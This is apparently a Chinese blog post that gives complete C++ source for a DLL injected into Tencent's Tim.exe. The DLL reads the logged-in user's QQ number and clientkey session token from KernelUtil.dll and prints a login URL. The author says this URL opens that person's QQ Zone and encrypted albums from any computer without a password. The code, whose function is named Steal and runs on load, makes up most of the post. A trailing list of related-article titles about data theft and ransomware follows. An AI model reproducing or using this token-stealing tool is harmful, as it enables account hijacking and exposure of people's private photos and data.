编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~

DLL源码:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdio.h>
#include <WTypes.h>//定义CTXStringW为BSTR
typedef BSTR CTXStringW;CTXStringW AllocTXString(const wchar_t* lpSrc)
{if (lpSrc == NULL) return NULL;BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];if (bBuffer == NULL) return NULL;DWORD dwZero = 0;DWORD dwCount = 3;DWORD dwLenth = wcslen(lpSrc) + 1;memmove(bBuffer + 0 * 4, &dwZero, 4);memmove(bBuffer + 1 * 4, &dwCount, 4);memmove(bBuffer + 2 * 4, &dwLenth, 4);memmove(bBuffer + 3 * 4, &dwLenth, 4);wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);return CTXStringW(bBuffer + 16);
}VOID Steal()
{do {HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");if (hKernelUtil == NULL){OutputDebugStringA("Get KernelUtil Module failed \n");break;}PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");if (PtrGetSelfUin == NULL){OutputDebugStringA("Get GetSelfUin Function failed \n");break;}DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);if (uin == NULL){OutputDebugStringA("Invoke GetSelfUin Function failed \n");break;}// Print QQ numberchar szUin[MAX_PATH] = { 0 };sprintf(szUin, "%d", uin);PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");if (GetSignature == NULL){OutputDebugStringA("Get GetSignature Function failed \n");break;}WCHAR wsBuffer[MAX_PATH] = { 0 };CTXStringW ClientKey = AllocTXString(wsBuffer);PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");if (res == NULL){OutputDebugStringA("Invoke GetSignature Function failed \n");break;}// 复制下面链接,无需密码,进入QQ空间char msg[MAX_PATH] = { 0 };sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);OutputDebugStringA(msg);} while (0);}BOOL APIENTRY DllMain( HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved)
{switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:Steal();break;case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;
}

窃取ClientKey相关推荐

  1. 在Chrome中打开网页时出现以下问题 您的连接不是私密连接 攻击者可能会试图从 x.x.x.x 窃取您的信息(例如:密码、通讯内容或信用卡信息)

    现象:在Chrome中打开网页时出现以下问题 您的连接不是私密连接 攻击者可能会试图从 x.x.x.x 窃取您的信息(例如:密码.通讯内容或信用卡信息). 当点开"了解详情"后显示 ...

  2. 如何防止博客文章被窃取

    写文章的优点: 1.整理自己的学习过程,思想心得. 2.看到自己的文章被别人转载了,心理愉悦,说明作者写的文章有价值,可以帮助他人. 缺点: 1.花费时间和精力. 2.说是抄袭别人.明明自己是原创,别 ...

  3. 新勒索软件DynA-Crypt不仅要加密你的文件,而且窃取并删除它们

    本文讲的是新勒索软件DynA-Crypt不仅要加密你的文件,而且窃取并删除它们, 一个名为DynA-Crypt的新勒索软件被GData公司的恶意软件分析师Karsten Hahn发现,DynA-Cry ...

  4. 黑客用上机器学习你慌不慌?这 7 种窃取数据的新手段快来认识一下!

    作者 | IrrfanAk 译者 | 天道酬勤.Carol 责编 | Carol 出品 | AI科技大本营(ID:rgznai100) 机器学习以分析大型数据集和模式识别的能力而闻名.它基本上属于人工 ...

  5. 特斯拉起诉小鹏汽车员工窃取商业机密,何小鹏回应

    参加 2019 Python开发者日,请扫码咨询 ↑↑↑ 整理 | 琥珀 出品 | AI科技大本营(ID:rgznai100) 3 月 21 日,外媒 TheVerge 报道称,特斯拉正针对多名前雇员 ...

  6. AI一分钟 | 小鹏汽车回应前苹果员工窃取商业机密:积极配合相关调查

    ▌苹果前华人工程师涉窃密被捕,小鹏汽车回应 今日(7月11日),有外媒报道称,苹果前雇员张晓浪因窃取商业机密罪被美国联邦调查局逮捕并被起,该员工即将加入小鹏汽车. 小鹏汽车的声明如下: 我们关注到 7 ...

  7. AI一分钟 | 贾跃亭这次真的没钱了,法拉第只够发到年底工资;自动驾驶风云:Uber竟被爆料收购窃取Waymo机密的公司

    图片来源:人民网 一分钟AI 携程推出"机器人酒店前台" 法拉第未来前员工:公司陷入停滞,钱只够发年底前工资,在职员工干脆不去公司上班了. Uber收购的自动驾驶公司被起诉窃取Wa ...

  8. 黑客组织利用El Machete窃取全球政府超过100G数据

    网络间谍活动一直是热议的话题,各类媒体不乏频现各种网络间谍活动,尤其前几年更是"炒得火热".近期,网络间谍活动又"风生水起". 黑客组织利用El Machete ...

  9. Android后门GhostCtrl,完美控制设备任意权限并窃取用户数据

    Android系统似乎已经成为世界各地病毒作者的首选目标,每天都有新的恶意软件在感染更多的设备. 这一次,安全公司趋势科技发布警告,他们发现了一个新的Android后门--GhostCtrl Ghos ...

  10. 零售行业O2O盛行 或成黑客窃取数据目标

    2019独角兽企业重金招聘Python工程师标准>>> O2O等新型业态为传统零售业的转型带来了巨大的机遇,但与此同时,日趋严重的数据外泄风险却在阻碍着这一转型的实现.亚信安全近期发 ...

最新文章

  1. pyhton列表习题
  2. HDU 4911 Inversion 树状数组求逆序数对
  3. 使用lt;jsp:includegt;,不想写死URL,动态生成URL的解决的方法
  4. java的druid连接
  5. 转载-----Java Longest Palindromic Substring(最长回文字符串)
  6. UITextField 文本字段控件 -- IOS (解决键盘遮住View及密文設定的问题)(实例)
  7. matlab中waitbar用法,matlab中waitbar
  8. java登陆代码_Java用户登陆界面例子 代码
  9. NV12转化为BMP函数
  10. ADMEMS 软件设计架构方法
  11. 博科BROCADE交换机开启snmp服务
  12. 好用的python工具_Python哪些工具好用?老男孩Python开发
  13. 服务器虚拟化分步实施,服务器虚拟化解决实施方案.doc
  14. Mac下输入法总是默认中文,怎么设置成英文的?
  15. 嵌入式开发有年龄限制吗_32岁入门晚不晚?来听听这位70后程序员的故事
  16. 腾讯开发者登录不上去
  17. 【wanaflyCamp】电音之王
  18. JavaWeb---HTTP与Request
  19. python逗号表达式_正则表达式 - 在第一个逗号前获取所有内容。 - python
  20. 集成灶哪个品牌质量好(六款热销集成灶对比测评)

热门文章

  1. UltraEdit 注册机使用激活方法:
  2. 基于java的教师教学评价管理系统
  3. Elasticsearch摄取节点(十)——GeoIP以及Grok处理器
  4. ubuntu下运行spoonwep破解无线网络
  5. java语言jsp技术_JavaWeb:JSP技术基础
  6. java并发编程入门_Java并发编程从入门到精通 PDF 下载
  7. google退出中国市场是战略性错误
  8. Sonix SN9P701 OCR点读笔二维码识别源码
  9. eclipse安装教程|最详细eclipse安装 配置图文教程
  10. 用计算机制作标准曲线的方法,如何制作标准曲线